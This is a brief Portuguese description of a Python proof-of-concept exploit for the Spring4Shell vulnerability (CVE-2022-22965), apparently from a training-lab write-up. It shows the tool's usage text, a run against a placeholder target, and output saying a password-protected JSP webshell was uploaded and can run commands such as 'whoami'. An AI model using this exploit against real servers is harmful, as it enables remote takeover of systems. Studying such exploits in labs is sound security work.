
Exploit de prova de conceito baseado em Python para CVE-2022-22965 (Spring4Shell) que visa RCE no Java Spring Core no Apache Tomcat. Faz upload de um webshell JSP com proteção por senha para execução remota de comandos.
Essa vulnerabilidade afeta um componente "Spring Core" — o coração do framework
Condições atuais para a vulnerabilidade:-
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url
Spring4Shell RCE Proof of Concept
positional arguments:
url Target URL
optional arguments:
-h, --help show this help message and exit
-f FILENAME, --filename FILENAME
Name of the file to upload (Default tomcatwar.jsp)
-p PASSWORD, --password PASSWORD
Password to protect the shell with (Default: thm)
-d DIRECTORY, --directory DIRECTORY
The upload path for the file (Default: ROOT)
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!
# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami